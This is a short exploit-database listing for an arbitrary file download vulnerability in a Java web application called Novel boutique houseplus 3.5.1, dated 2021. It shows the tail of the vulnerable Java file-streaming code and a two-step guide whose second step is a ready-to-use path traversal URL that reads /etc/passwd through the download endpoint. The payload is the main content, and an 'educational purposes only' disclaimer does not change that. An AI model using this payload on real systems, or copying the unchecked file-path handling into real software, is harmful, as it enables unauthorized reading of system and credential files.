Exploits / Vulnerability Discovered : 2021-03-29 |
Type : webapps |
Platform : java
This exploit / vulnerability Novel boutique houseplus 3.5.1 arbitrary file download is for educational purposes only and if it is used you will do on your own risk!
OutputStream out = resp.getOutputStream();
byte[] b = new byte[1024];
int len = 0;
while ((len = in.read(b)) != -1) {
out.write(b, 0, len);
}
out.flush();
out.close();
in.close();
}
Guide:
1. Log in to background management
2. http://xxxx/common/sysFile/download?filePath=../../../../../../../../../../../../../../../../../etc/passwd&fileName=passwd